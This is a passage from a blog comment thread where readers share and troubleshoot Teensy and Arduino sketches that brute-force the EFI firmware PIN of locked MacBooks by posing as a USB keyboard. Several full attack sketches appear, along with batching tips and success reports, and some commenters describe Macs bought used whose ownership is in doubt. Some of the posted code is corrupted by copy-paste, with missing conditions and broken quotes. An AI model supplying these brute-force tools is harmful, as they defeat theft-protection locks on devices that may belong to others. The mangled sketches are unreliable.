    • To be honest I am not 100% sure right now about the “programmer” settings but I can check that in a few days. Make sure you installed “Teensyduino” instead of the Arduino SDK.

  36. ALNNN

    The EFI Locking Password accepts just Numbers right? i mean 4 Digits, i gotta buy the Teensy people are asking for 200$ to unlock a Macbook Pro and thats way to much… I cant even afford it lol Looking forward to get a Teensy and flash your code and try it!

    • Which Teensy people are you talking about? Also, did you took it to the apple store and what answer did you get from them?

  37. jake

    Can someone confirm that the EFI pin is definitely 4 numbers? My EFI entry screen has a free textbox and a padlock icon. I can enter letters and numbers of any length in that box.

    How do we know that the EFI code is 4 digits?

    • It is only numbers… it accepts letters but you can only set the PIN with numbers. There is a slight chance that the PIN is of 6 digits instead of 4

  38. Walner

    Friend apology bother another look around here only I get something very curious, macbook pro after 4 hours or so with teensy 3.0 doing their job goes ,

    I leave it all night but taking account as 4 maximum hours I find when I turn it off and see the code out other, may be going ??

    very nice thanks for your time

    pd: I have effective blocking to try formatting and so I have all the time connected

    • If you're attacking the EFI and the iCloud, it is possible that in those 4 hours and have found the code. As you were not pending, the computer then stood instructions, until it was shut down for lack of use.

      If you're attacking the iCloud, it is likely that in the cycle of 15 minute he enters sleep mode and for any reason to shut down or hibernate.

  39. Walner

    Good news , are right friend, Many thanks Orvtech worked for me perfectly in these 4 hours and had the code 0725 excellent

    I'm glad that I've worked your technique , thanks for all friend , I would like to know if you could explain to me how did you put the code on a screen in real time

    again the code works very well for me and icloud confirm that the code is the same as the EFI

    • to

      A consultation,
      After you have found the code efficiency, iCloud prompted the code also?

      What happens is that you start with the code efficiency tratanto, but after a few hours I was no longer pending, back and as I was applying the code iCloud?
      It is the normal cycle?

      Walner, after 4 find exact times that code? BUT the fueron less minutes?
      I ask because I want to set my range again.

      Thanks!!

      • One, is the normal procedure is the same number of 4 digits

  40. Aidan

    I am interested in purchasing the Teensy 3 to unlock some Macbook Pros. I am new to programming and all this so before i buy i would like to check this is the correct procedure to use the Teensy.

    1. Plug it in and set it up.
    2. Download and open Arduino
    3. Paste the code which has random seconds between codes into Sketch
    4. Click Verify
    5. Plug the Teensy into the Macbook and turn the Macbook on.

    If this is all correct, just wondering which code to use as people have posted up a few different codes.

    • Correct except… download Teensyduino instead or Arduino SDK.

  41. carlos alvarado

    Hi Oliver and thanks for all your support, i did upload code to my new teensy and i tried on text editor to see if it works and it only input until number 0005 then wait 2 min and 0006 after that it won’t do anything, am I doing something wrong? I already upload code lot of times.

  42. Anthony

    I’ve downloaded arduino and teensyduino and have selected Teensy 3.0 in tools and copy/paste the code but when i hit verify I get this error,

    Arduino: 1.0.5 (Mac OS X), Board: “Teensy 3.0″
    /Applications/Arduino.app/Contents/Resources/Java/hardware/tools/arm-none-eabi/bin/arm-none-eabi-g++ -c -g -Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mcpu=cortex-m4 -DF_CPU=96000000 -MMD -DUSB_VID=null -DUSB_PID=null -DARDUINO=105 -mthumb -nostdlib -D__MK20DX128__ -fno-rtti -felide-constructors -std=gnu++0x -DUSB_SERIAL -DLAYOUT_US_ENGLISH -I/Applications/Arduino.app/Contents/Resources/Java/hardware/teensy/cores/teensy3 /var/folders/lv/lvOiFKZZE94Cxa-C37k7cU+++TI/-Tmp-/build8312858228448644647.tmp/sketch_jun19a.cpp -o /var/folders/lv/lvOiFKZZE94Cxa-C37k7cU+++TI/-Tmp-/build8312858228448644647.tmp/sketch_jun19a.cpp.o

    I can’t even run the test programs, what am i doing wrong?

  43. also

    Hello.
    It is normal for the processor fan sound too, while the lock screen is?

    Regards

    • A mi no me step eso, I could not tell if it is normal or not but in theory it is. In this state the Mac should not be doing anything.

    • TeensyTester

      Yes, mine had it as well. For about one hour and then it went silent.

  44. to

    I commented that when cmd r give me a black screen and does not ask for any key.
    So what I did was:
    1) SMC reset by pressing, shift + ctr alt power button. (The fan sounds pretty)
    2) The ignition and turned to off.
    3) was returning to ignite with alt pressed and now I get the lock, but the fan sounds pretty.

    How else can I exit the EFI lock padlock?

  45. Anthony

    I finally got it working on a Windows 8 machine. I think the error I was getting on my Mac has something to do with where I installed Teensyduino. I haven’t gone back to check because I’ve been using the built in Isight to track the progress. It only records 13h30m34s at a time but by my calculation this is approximately 2500. I have just modified the code to start at 2500 and will begin the second quarter of the attack.

  46. Anthony

    So I’ve gone through all 10,000 codes and still haven’t cracked it. Is there any other way to crack a 6 digit without waiting 200 days or paying even more money? Any help is appreciated.

    • Take a look at the work of [Snare] on http://ho.ax but it is way more complex than this. If I were you I would start over with the 4 digit PIN attack just to be sure.

  47. pablo

    My question is: I should modify the code so that you see effective starting in 0000 do better in 4589 e.g.. this in order to turn off the machine and continue the attack the next day and not have to repeat the whole process again from scratch.
    thanks for your answer

    • Try cambioando:
      int counter = 0;

      By:
      int counter = 4589;

  48. Anthony

    Today while checking on the attack I noticed that only 3 digits were being input. However, when I started this quarter of the attack and this morning when I checked on it, it was definitely submitting all 4. I removed the Teensy and tested it on another machine in notepad and it worked fine. I have been breaking the attack up to do 2500 in each attempt. I’m guessing the delays either aren’t long enough or after a certain amount of hours they increase. I guess I’ll either break down my attacks even further to only do 1000 at a time or raise the delays you’ve set.

  49. Gilberto

    Hi I'm new at this a few months ago to buy a MacBook Pro on craigslist blocked I found interesting attempt to unlock the machine but it gave me headaches too until I found your information and got everything I need to connect the teensy 3 and starts automatically enter the numbers but after 5 k try this desabilitada tells me to wait a minute for this the teensy still theirs entering the code but when I see the screen with the 4 I walk to the fields and 0008 and then it will be normal again disable this teensy continue entering the codes I do.. help

  50. Adamsh

    Thans for what you doing guys, you make it sound so easy.
    Can one of you make a step by step tutorial to show a newbie how to work this ?
    From where to get the boards to how to load the program and how to make it work for EFI.
    Please do not assume that we all know what you are talking about.

    Thanks

  51. Armo

    I got in. THANK YOU. YOUR CODE WORKS. hahahahhahaha
    I got locked out because someone thought to play a funny joke and the password was lost.
    I ordered Teensy 3.0, plugged in my phone’s microusb cord and loaded the code.
    This is how I loaded the code: I installed Arduino, then I installed Teensy loader and pointed it to be installed in Arduino.
    I then copied and pasted the script into Arduino, clicked on Check/Verify, then I clicked on upload. At this point Teensy loader popped up and uploaded/programmed the code into Teensy.

    Here are some hints/steps/FAQ that I went thru and found out the hard way.
    1) Upload in batches!! Batches of around 1000 pins.
    Example from 1899 to 2033
    int counter = 1899; <<<Line 2 after the // // //
    if (counter < = 2033) <<<Line 11 after the // // //
    This is really important in case of power failure or other disconnection would not make you redo the entire code entering.
    2) Teensy takes about 30 seconds to start. One mistakes that I came across was when I had Arduino up and running and was changing the code batch, it started automatically and started to enter/type the numbers into the code. Be careful not to miss it. What I did was I opened Notepad, and once I saw it typing numbers, I pressed the button on Teensy to stop it, then I went and changed to batch in the code and reuploaded into Teensy.
    3) At times the load fails. Just press the button to reload teensy.
    4) Turn on the mac and have it on the EFI screen, NOT iCloud Pin screen. And enter a couple of numbers. after doing so plug in Teensy and WAIT, it takes a few seconds (around 30)
    5) When I came home and saw the iCloud PIN stating 3 minutes disabled, I knew that the correct code was entered. I had a timer and it was 2 hours out of 4.5 hours needed to complete my batch. My batch was from 1101 to 2103. However I made a mistake of fast forwarding around an hour or about 200 pins and I set the batch from 1301 to 2103. It went through the entire process and the code wasn't found. I thought It wasn't working BUT NOT SO FAST!!! I reset the batch from 1101 to 2103. After getting a drink I came back and saw the iCloud PIN!!!!! I then realized that the code was a few numbers away from 1101 and noticed TEENSY entering 1131. I then realized the reason it was 3 minutes disabled is because the Macbook was disabling the laptop in the iCloud and it didn't JUST find the code but was being delayed.
    MY PIN WAS 1129

    I hope this may help.
    LOVE YOU MAN. I was about the short the logic board with a AAA battery that I saw on ebay selling for $80. No more sweats tho :)

  52. Armo

    One more thing. When you start Arduino, after connecting teensy, click on Tools>Board and choose Teensy 3.0, in the bottom you should see Teensy on a com connected. Then choose Tools>USB Type > Serial+Keyboard+Mouse+Joystick. After this click on the first icon on the app where it says Verify, Make sure there are no errors after automatic compilation, it may automatically open Teensy loader and upload, to make sure it went thru click on the second icon with the arrow that says Upload. This should automatically start Teensy loader and load it. If problems arise, reUpload. More problems? click on the button on teensy and reupload.

  53. Armo

    One more thing. LOL. Every time I would put another batch, I would turn off the macbook and restart in a couple minutes.

  54. zacky

    Hy,
    Thanks for the code really appreciate .
    I want to ask if we have different keyboard layout (azerty) the codes are
    àààà
    ààà& and so on
    also in arduino if you change to different layout than US it will give you a error in keyboard.c if I remember .
    How to fix this ?
    If I try the iCloud code and change the keyboard to us the code will run but in the efi mode can’t select and don’t know if will type 0000,0001 or it will be àààà,ààà& ect.
    Also the sleep mode if is activated how to ad a key enter (example the spacebar) like this the mac don’t go to sleep mode (for the iCloud example )
    Thanks ,for your reply.

  55. brazen1445

    I’m impatient and and all radio shack had were Arduinos. So here is the sketch for a Arduino uno. You must flash the usb hid firmware for this to work. http://mitchtech.net/arduino-usb-hid-keyboard/

    //EFI Pin bruteforce
    const int ledPin = 13;
    int counter = 0;
    //waits for iCould
    int loops = 0;
    int value0 = 0;
    int value1 = 0;
    int value2 = 0;
    int value4 = 0;
    int fakecounter = counter;
    char pin[]=”xxxx”;
    uint8_t buf[8] = {
    0 }; /* Keyboard report buffer */
    void setup() {
    pinMode(ledPin, OUTPUT);
    Serial.begin(9600);
    randomSeed(analogRead(0));
    delay(200);
    }
    void loop(){
    if (counter <= 9999){
    delay(8000);
    digitalWrite(ledPin, LOW);
    delay(5500);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);
    //First Digit
    int value0 = pin[0] – '0';
    buf[3] = value0 + 29;
    if (buf[3] = 30){
    buf[3] = value0 + 29;
    Serial.write(buf, 8);
    delay(450);
    releaseKey();
    delay(420);
    }
    //Second Digit
    int value1 = pin[1] – ’0′;
    buf[3] = value1 + 29;
    if (buf[3] = 30){
    buf[3] = value1 + 29;
    Serial.write(buf, 8);
    delay(398);
    releaseKey();
    delay(510);
    }
    //Third Digit
    int value2 = pin[2] – ’0′;
    buf[3] = value2 + 29;
    if (buf[3] = 30){
    buf[3] = value2 + 29;
    Serial.write(buf, 8);
    delay(421);
    releaseKey();
    delay(423);
    }
    //Forth Digit
    int value3 = pin[3] – ’0′;
    buf[3] = value3 + 29;
    if (buf[3] = 30){
    buf[3] = value3 + 29;
    Serial.write(buf, 8);
    delay(430);
    releaseKey();
    delay(525);
    }
    //Enter Key
    buf[3] = 40;
    Serial.write(buf, 8);
    delay(305);
    releaseKey();
    }
    //reached 4 digit PIN max value
    if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
    digitalWrite(ledPin, HIGH);
    delay(20);
    digitalWrite(ledPin, LOW);
    delay(200);
    }
    delay(6000);
    }
    ++counter;
    fakecounter = counter;
    }
    void releaseKey()
    {
    buf[0] = 0;
    buf[2] = 0;
    buf[3] = 0;
    Serial.write(buf, 8); // Release key
    }

    • brazen1445

      The sketch I posted did not c/p right. The else if statements got dropped. I can upload it somewhere if anyone is interested, also have some batch files for automating the usb hid firmware flashing.

      • five

        my teensy is not powering up when i insert it in the disabled mac. it works on my running mac and the code is loaded. what could the problem be?

      • reiserfs

        Hi brazen, I’m definitely interested in the code.

    • khalilalucard

      Hi bro’,

      I try to compile your code but it dosn’t work. Arduino send me a message error in the line :
      int value0 = pin[0] – ’0′;
      I can’t find the problem, can you help me please ?

      Thanks a lot

      • khalilalucard

        Hi everybody,

        I finally found where is the problem of this code. There is a lot of copy/cut, so you have to correct the ” – ” and the ” ‘ ” at the pin[0] – ’0′; and everything would be fine. I have a lot of problem for understund how turn my Arduino into a keyboard but i finally find too.

        Thanks a lot for this Ovrtech and brazzen1445.

  56. five

    thanks for all of this information. when i plug my teensy into the disabled mac, i am not getting a led light which means no power and nothing is happening. when the teensy is in my mac that is running, and the code is added, everything seems fine, says done compiling and a prompt tells me to press button to activate. what could be the problem with it not working on the disabled mac. i powered on holding option to get to the efi screeen.

    • Armo

      I had to wait almost a minute for mine to start.
      Plug in a USB flash disk that has a light indicator to see if the usb port works. If not use a different USB port.
      Power up the macbook holding down the option and when the EFI screen comes, enter some digits and see if works manually.
      Do some troubleshooting and narrow the problem then post back. Good luck.

    • five

      figured it out..i think the teensy was starting while plugged in my good mac because i was activating it too soon. what worked for me was to wait for the teensy to reboot after the sketch is uploaded and then to move it quickly to the disabled mac. it’s been running for 18 hours.

  57. Gratefull soul

    Thank you so much, this was very helpfull!
    ordered the teensy 3 wich I recieved 3 days later, great shipping times!
    Got it set up with your code, and I had the password within 14 hours or so.

    Again, thank you very much for sharing this

  58. San X

    was wondering if Teensy 2.0 will work with this?

    • It should work.

  59. bloody

    Hello everyone!
    Sorry for my English.
    Thanks for the development of such a topic.
    Please help in the code for Ardruino UNO r3
    The above codes for the card fails.
    Pevy code, nothing happens.
    The second gives an error
    Please help with the code for Ardruino UNO r3
    three months without a laptop

  60. Blody

    SUCCESS!!!!!!!!!!
    MBA 2012.
    SSD was formatted completely.
    So what about the generation of random 6-digit password is the question!!
    IT used Ardruino R3
    Sorry for the english

  61. BIZZ

    IS THERE A WAY TO SPLIT THE ”USB KEYBOARD” SIGNAL SO WE CAN SEE IT TYPING VIA ANOTHER COMPUTER JUST SO WE CAN KNOW FOR SURE WHAT IS GOING ON WITH THE INPUT.

  62. thomasb_it

    Thank you man. Really thank thank thank you so much!!
    Thanks to you brute force code i get the much hated EFI Password and the iCloud PIN.
    The attack took only 12 hours. Unfortunately the first attempt i was sleeping (night time) and i lose the code.
    The next day (today) i supposed that the code could be between 500 and 1000 and it was 0734!! :D
    I made a simple calculation of what range could be after the time that has been passed since the begin.
    Thanks, you are the number 1!!
    Cheeers!!

    • ALNNN

      I got a question for you… how did you know you’re code was 0734? were you watching that batch?? 500-1000?

      Thanks for the info!

      • I ran it a couple of times right after I noticed it had restarted to narrow down the number. I used the shell script I posted to get a better idea about the range that the PIN could be in.

  63. Hey Orvtech,

    The code worked like a charm thanks again for posting this. I had some trouble at first with the mac falling asleep on me and for some reason the Tab key hack didn’t work so i added some mouse movements to your code. Here it is if anyone else is having the same issue.

    #include
    const int ledPin = 13;
    int counter = 1070;
    //waits for iCould
    int loops = 0;
    int fakecounter = counter;
    int time = 0;
    char pin[]=”xxxx”;
    void setup() {
    pinMode(ledPin, OUTPUT);
    delay(30000);
    Mouse.begin();
    }
    void loop(){
    keyboard_modifier_keys = 0;
    //lets wait 1 minute and 1 second
    if (loops == 5){
    while(time<6){
    digitalWrite(ledPin, LOW);
    Mouse.move(10,10,0);
    delay(5000);
    Mouse.move(-10,-10,0);
    digitalWrite(ledPin, HIGH);
    time++;
    delay(5000);
    }
    delay(1000);
    time = 0;

    }
    //lets wait 5 minutes and one second
    else if (loops == 6){
    while(time<30){
    digitalWrite(ledPin, LOW);
    Mouse.move(10,10,0);
    delay(5000);
    Mouse.move(-10,-10,0);
    digitalWrite(ledPin, HIGH);
    time++;
    delay(5000);
    }
    delay(1000);
    time = 0;

    }
    //lets wait 15 minutes and 1 second
    else if (loops == 7){
    while(time<90){
    digitalWrite(ledPin, LOW);
    Mouse.move(10,10,0);
    delay(5000);
    Mouse.move(-10,-10,0);
    digitalWrite(ledPin, HIGH);
    time++;
    delay(5000);
    }
    delay(1000);
    time = 0;
    loops = 0;
    }
    //lets get to work
    if (counter 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
    digitalWrite(ledPin, HIGH);
    delay(20);
    digitalWrite(ledPin, LOW);
    delay(200);
    }
    delay(6000);
    }
    ++counter;
    ++loops;
    fakecounter = counter;
    }

    • tony

      hey arod, when i verify this code ^ i am getting an error, can you please help?

      char pin[]==”xxxx”;

      **stray ‘\’ in program**
      **error: expected ‘)’ before numeric constant**

      Thank you in advance!
      I am so close, but sometimes I will get 3 digits because of sleepmode.

      • Thats a Ctrl+C / Ctrl+V error.

  64. San X

    looks like someone is selling one on ebay!

    • Yeah, I got reports on a forum of some one who bought one of those and locked their firmware with a longer password and requesting ramson to unlock it.

  65. jambus

    hola orvtech
    te para escribo not certe you Consulta…
    como saber cual es of CLAVE del mac?
    familiarizado no estoy con el lenguaje del codigo del script.
    lo Otro. cuando se encuentra of CLAVE, el teensy I check inyectando?
    muchas gracias por ayuda en ESTO only…

    regards!

    • Como saber cual es of CLAVE del mac?
      - La pantalla cambia, posiblemente se reinicie

      Cuando se encuentra of CLAVE, el teensy I check inyectando?
      - One

  66. Hola Orvtech,
    Que es mas seguro usar el Teensy o un SPI Bus E-Eprom programmer y hacer flash al chip mas rapido?

    • Un ataque de fuerza bruta vía teclado (teensy en este caso) no tiene ninguna consecuencia negativa siempre y cuando seas tu el que programó la tarjeta y revisaste el código que estas subiendole.

      Un programdor de eeprom en teoria podria reescribir ese eeprom con la data de un MBP virgen que no esté bloqueado pero tiene al menos 2 riesgos que vale la pena mencionar.

      • Si alguien te lo da (regalado o comprado) y ya viene pre-programado, no sabes que esta inyectando exactamente y si tiene algun codigo malicioso que en un futuro pueda ser usado como un backdoor, capture información importante y la envie a alguien, etc..
      • Si algo falla, you'll have to replace the eeprom and I personally do not I have the pulse, the tools or expertise to take out the old and weld the new one without damaging the card
      • Thanks for clarifying the question…
        I have an Arduino UNO R3 is this code compliant??

        • Not sure, in theory, mode if USB support HDI may work with some other change

          • Josué

            Es completamente incompatible, yo lo probé primero con un arduino UNO r3 y no funcionó en lo absoluto.
            Ya con el teensy todo parecía el paraíso pero tuve un problema, que al rato se ponía la máquina en suspensión (o a hibernar, no lo se) al final lo solucioné programando un servo que presionara el clic del trackpad en medio de los intervalos de 5 y de 15 minutes. However, luego de un periodo de prueba noté que se había corrido el ciclo de espera y empezaba a escribir códigos en los momentos intervalos en los que había que esperar y por lo tanto no estaba probándolos todos, ¿no se sí alguien me pudiera ayudar con eso?

          • Josué,

            Este artículo es para el EFI, no hay intervalos de 5 and 15 minute, creo que estas confundiendo este código (el del EFI) con el del iCloud. Con respecto al problema de que la computadora apaga la pantalla hay gente que lo ha solucionado poniendo algo de peso sobre una tecla (no recuerdo cual), esta entre los comentarios.

            Por las dudas este es el artículo del iCloud: http://orvtech.com/howto/ataque-fuerza-bruta-pin-icloud/

            Si no te interesa el contenido del disco, te recomiendo formatearlo desde otra maquina y usar este, el del EFI por que es mas rapido

  67. Kevin Jacobs

    So i got this code working now, bought my mac from a random guy and he also locked it but, will it be possible for him to lock it again even when i format all the stuff? would be very disappointing if it stays this way :\

    • I am not sure but from what I heard if you write a new PIN lock to that mac, it cant be locked again using the same number you just cracked.

  68. GhoHan

    Hi orvtech,
    After waiting for 1 year I finally found this website as an answer to my macbook pro. I thank you very much.
    can you help me to check this script code right or not.
    i’m modify your script for reached 6 digit PIN max value
    Now still running …. but i don’t know that script is right or not.

    #include
    const int ledPin = 13; // choose the pin for the LED
    int counter = 0;
    int fakecounter = counter;
    char pin[]="xxxxxx";
    void setup() {
    pinMode(ledPin, OUTPUT); // declare LED as output
    delay(10000);
    }
    void loop(){
    keyboard_modifier_keys = 0;
    if (counter 999999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
    digitalWrite(ledPin, HIGH);
    delay(20);
    digitalWrite(ledPin, LOW);
    delay(200);
    }
    delay(6000);
    }
    ++counter;
    fakecounter = counter;
    }

    I hope i can use again my Macbook …
    Thanks before, Best Regards.

  69. GhoHan

    Hi ovrtech.
    Release my Code,
    i’m try and error now i successfully to unlock EFI PIN my MacBook using below code modification. Faster and Clean really so awesome, thanks ovrtech.

    This code reached 6 digit PIN i use to success unlock my MacBook:

    #include
    const int ledPin = 13; // choose the pin for the LED
    int counter = 0;
    int fakecounter = counter;
    char pin[]="xxxxxx";
    void setup() {
    pinMode(ledPin, OUTPUT); // declare LED as output
    delay(5000);
    }
    void loop(){
    keyboard_modifier_keys = 0;
    if (counter 999999){
    for (int blinkies = 0; blinkies < 9; blinkies++) {
    digitalWrite(ledPin, HIGH);
    delay(20);
    digitalWrite(ledPin, LOW);
    delay(200);
    }
    delay(4000);
    }
    ++counter;
    fakecounter = counter;
    }

    regards

    • pctech101

      Not sure if you’ll help me but I will ask anyhow.
      I bought an LCD module HD44780 off ebay to add to my breadboard with the Teensy 3.0 w/ pins to hopefully show current counter. Is the modification I did to the code correct for displaying the current counter or have I stuck it in the wrong areas?
      I dont have my Teensy or LCD module yet, I just bought it today so I expect to have it mid week. I’m a total newb at this.

      Code:

      #include <usb_keyboard.h>
      //****MODDED By ME To Add LCD****
      #include <LiquidCrystal.h>
      // Set pins for LCD HD44780 display
      // Taken from http://darcade.de/electronics/connecting-teensy-3-0-lcd-hd44780-display
      LiquidCrystal lcd(23, 22, 16, 15, 14, 13);
      //****MODDED By ME To Add LCD****
      const int ledPin = 13; // choose the pin for the LED
      int counter = 0;
      int fakecounter = counter;
      char pin[]="xxxx";
      void setup() {
      pinMode(ledPin, OUTPUT); // declare LED as output
      delay(10000);
      //****MODDED By ME To Add LCD****
      // set up the LCD's number of columns and rows: 
      lcd.begin(16, 2);
      // Ex. set the cursor to column 0, line 1
      // Ex. (note: line 1 is the second row, since counting begins with 0):
      // Ex. lcd.setCursor(0, 1);
      // Hopefully next command prints characters on 1st row starting at 1st Position
      lcd.setCursor(0, 0);
      //****MODDED By ME To Add LCD****
      }
      void loop(){
      keyboard_modifier_keys = 0;
      if (counter <= 9999){
      delay(8000);
      digitalWrite(ledPin, LOW);
      delay(5500);
      digitalWrite(ledPin, HIGH);
      sprintf(pin, "%04d", fakecounter);
      //sending first digit
      Keyboard.press(pin[0]);
      delay(450);
      Keyboard.release(pin[0]);
      delay(420);
      //sending second digit
      Keyboard.press(pin[1]);
      delay(398);
      Keyboard.release(pin[1]);
      delay(510);
      //sending third digit
      Keyboard.press(pin[2]);
      delay(421);
      Keyboard.release(pin[2]);
      delay(423);
      //sending forth digit
      Keyboard.press(pin[3]);
      delay(430);
      Keyboard.release(pin[3]);
      delay(525);
      //sending enter
      Keyboard.press(KEY_ENTER);
      delay(305);
      Keyboard.release(KEY_ENTER);
      //****MODDED By ME To Add LCD****
      // Print a message to the LCD.
      // Hopefully prints value in counter?
      lcd.print(counter);
      //****MODDED By ME To Add LCD****
      }
      //reached 4 digit PIN max value
      if (counter > 9999){
      for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
      delay(200);
      }
      delay(6000);
      }
      ++counter;
      fakecounter = counter;
      }
      
  70. ALNNN

    I thought this was dead haha, I mean for sure we will never know what was the Teensy code “soothsayer” in an attempt to crack the password? From what I read it would be best to “batches” of 1000 or 2000 order to have a specific range where search. These days I ask the Teensy because I really need to fix that MBP this right now as a paperweight. Rather Ovrtech Many thanks for taking the time to answer all questions, even people who do not read or post…

    Thanks!

  71. Razvan

    Hi orvtech,

    I have a small issue with my Teensy. Using the code for the uefi brute force attack, at some point it starts entering only 3 digits instead of 4 , and I really can’t figure out why , or what to do. Any suggestions are very welcome. Thanks.

    • TeensyTester

      Hi,

      i got the same thing around 3xxx; i just restarted the Teensy with an offset of 3000; At some point, the computer gets a hickup and uses more then 20 sec. to input a code. That messes up the whole cyclus.

      Reprogrammed with modified offset worked for me.

      • Is it connected to internet?

        • TeensyTester

          No it was not.

  72. Rod Wise

    Muchas gracias por el código, valió la pena la inversión del Teensy, confirmo que funciona y el pin del EFI resulto ser el mismo del iCloud.

  73. Alan Geek

    I dont have Tensy anyone want to share the code for the ARDUINO UNO? Please I saw 2 codes here but they are invalid and none work….please hit me up if you have it, Thank you.
    I just want to test it in my Macbook Air for educational purposes…

  74. chris

    Getting this error. Using a Macbook

    sketch_sep06a.ino:1:27: fatal error: usb_keyboard .h: No such file or directory
    compilation terminated.

    • Make sure you enable Keyboard support on the SDK, this has been covered before by previous comments.

  75. Carlos

    Conseguí desbloquear mi MBP! Siguiendo los pasos, no tiene perdida! Gracias ORVTECH!

  76. Jaime

    Hello orvtech, look and I have my teensy 3 programmed with the Arduino and did reboot after the LED stopped teensy pardear, the mac connect the blocked and does nothing the teensy, the mac reconnect to where the program and the LED still does not turn on, idea that you can be… Thanks!!!

    • Try re-program it with the code again. Try it in notepad or your favorite plain text editor and check that all this worked as expected. When connecting expected 1 minute.

  77. Tim M.

    ok, so now i need some real help here.. i have a macbook pro from late 2011.. and i was curious about the firmware password.. so i googled how to set one and set one.. it let me set a password an 11 character password.. that was kind of disappointing.. if all these codes are to crack passwords with 4 or 6 digits, i don’t think they are going to do me any good.. thoughts, comments or suggestions on what you think i might be able to do would be great.. i have no need for any data that is currently on that macbook that i’m trying to crack.. so i’m wondering if i can just put a new hard drive in it and get around it.. what i’m confused about is why on my personal macbook that i set the firmware password on, did it just boot right up, and on the one thats locked, it goes to the folder lock screen?? i guess that will probably still be there even if i pull the hard drive and put another on in it since the efi lock comes up with i hold the option button down… now i’m really confused… maybe i’ll have to try flashing the bios chip??

    • From a Mac it allows you to set a longer password but most of the time these sellers that want to extortion you would just do it from their iphone/ipad and set a easy number that they would remember thus setting a 4 digit long password.

      You are seeing the “Folder” lock screen probably because the seller wiped the HDD of the mac and it doesn’t know from were it has to boot.

      If you set it on your mac it lets you boot anyways, what it does not allow you is to boot from another device or reinstall the computer. Further locking (preventing you from using it) can be done through iCloud by marking your Mac as lost or stolen.

  78. Jaime

    orvtech return the comment that I worked will al 100%, thank you very much, that it hice fue test in ranges 1000 in 1000 and finally in 4652 meeting my code… Thanks again.

  79. Aaron

    Hi,

    I started my attack @ 00:00 and fell asleep about 5:30. When I woke up @ 07:30 it had been successful, how do I narrow down what the pin could be?

  80. Mike

    Orvtech

    Whats the latest code i can use? the one above at the top of this page stops working after the 15 min delay. after that nothing happens after that.
    anyone can help me with that?
    thanks

  81. Mike

    Ovrtech

    Im using the code at the top of the page. It stops working after the 15 min delay.
    is there something i did wrong? can u guide me to the latest version of the code?

    thanks

  82. shouts

    hi guys,,, hi Oliver…
    hi do you manage the 1, 5, and 15 minuts of delay??
    you could let the mac 5 Attempts, and then there's a delay of 1 minute.
    then, let you put it another try of 4 digits, and a new delay of 5 minutes..
    and the next delay is about 15 minutes…and the loop starts again.
    in the code that's delays are not contemplated, right?

  83. Sway

    Hello. Sway here. I had a question concerning the EFI password. A family member of mine bought a used MBP (at the flea market) and asked me to reformat the hard drive for them. When I proceeded to boot from an external drive, it locked and requested that pin. (apparently the old user never removed it or perhaps it was a stolen one =/) I have searched the web for ways to bypass it and tried taking out the hard drive and mounting it on my own macbook using an ide/sata to usb kit to locate the “.lock” file. It never mounted, although it showed up on disk utility. I tried to repair the disk, but disk utility gave me a message saying that is was not repairable and suggest that i back up as much as possible and reformat the hard drive. I passed on that. I did run into a few problems getting it to show up on the disk utility list a few times, so I plugged and unplugged it quite a few times. When I reinstalled the hard drive back into it’s original MBP and started up the computer, I received the folder with the ? mark symbol. I forced shutdown the computer and restarted it and this time it loaded to the pin screen. After shutting it down and restarting it again, it gave the flashing folder with the ? again and has been giving that since. Any suggestions on what to do? I tried to reset the PRAM, but it didn’t seem to work. I’m afraid that some of the data on the drive got corrupted, or the cables got damaged. Not sure how to go about this. Any help would be greatly appreciated!

    • That “?” sign means that it cant find a bootable unit. I am not a mac user so I am not 100% sure how to do this. I strongly suggest you read oficial apple documentation regarding that.

    • TeensyTester

      Sounds like your OS X version is corrupted. I’d try to install a fresh version of OS X on the harddrive from a working mac and then replace it back into the original mac. That should work.

      The question mark symbol tells you that there is no bootable harddrive present.

  84. RKM

    I have this same problem with my macbook pro. I have no experience with scripts or coding or anything of the like. I have been thru this/ your tutorial a few times and i am very impressed. I was hoping to get some help with how to program my newly bought teensy? Please help is very much appreciated. ORVTECH, If you would email me, I am totally willing to compensate you for your time/help since i have no idea what to do and i have a few questions.
    Please help me.

  85. mike

    hey i see on XXX a guy that was on the site asking for explanation on how to load the teensy but he is selling the usb efi removal on ebay for 185 now but in his description he says below …. my question is which code is he running that automatically remembers the right code?? would be nice if he shared some insight being as though he did get the info from here..

    This solution will take up to 3 days to scan all the number from 0000-9999 and
    it will NOT work all the time. It won’t work if user had set EFI password before remote lock with iCloud And it is the UNLIMITED tool

    Easy to use, just hold option key while turn on the Mac, then plug the tool to USB port and wait for 10 seconds, then push button next to usb connector on the tool, it will started by it self , And automatic remember the correct password (+/- 2 number) if you have any bootable Os installer in the USB thumb drive or internal HDD , User can read the correct password when plug in any PC/Mac with note application.

    redacted by orvtech

  86. szoesd

    How about Orvtech, as saber that number stayed the teensy entering the correct code, or what my code saber?, message appears on the screen or something?.

    Thank you very much!

    • ALNNN

      Deberás calcularlo el teensy averigua cuatro claves por minuto tendrás que hacer un calculo matemático para saber en que numero podría estarAbajo hay alguien que conecta un display a un Teensy haciéndolo mucho mas fácilYo al final cuando descubrí que rondaba entre 2500 and 2600 por ejemplo lo hacia a manoera mucho mas rápido que esperar que el teensy lo adivinara y al final igual no saber por cual había quedadoInténtalo!

      • El problema de agregar una pantalla es que lo haría muy facil para aquellos que quieran darle uso comercial. Mi idea fue resolver un problema personal en el que esperar 1 dia o 2 dias me daba igual.

  87. Justincredible

    FYI – Doesn’t really pertain to cracking the code.

    If it is still under warranty apple will, in the words of the guy at the genius bar “have to replace the logic board.” I call BS. Either way they will do it for no charge if the laptop is still under warranty.

    Apple doesn’t care about ownership. You cannot report your laptop stolen to Apple; they don’t care. Imagine the paperwork that would go along with that… Yikes.

  88. pctech101

    I got my Teensy and HD44789 LCD module
    I played with the code to enable the LCD and to show current code
    Info for setting up Teensy 3.0 to HD44789 Display module can be found at:
    http://darcade.de/electronics/connecting-teensy-3-0-lcd-hd44780-display
    ***Note: I changed pin assignment from above websites post on last 2 pins so ovrtechs code would still use pin 13 for LED… Changed the line to: LiquidCrystal lcd(23, 22, 16, 15, 17, 4);
    View my code, I commented as best I could…


    #include
    #include

    /*
    The keyboard code was taken from
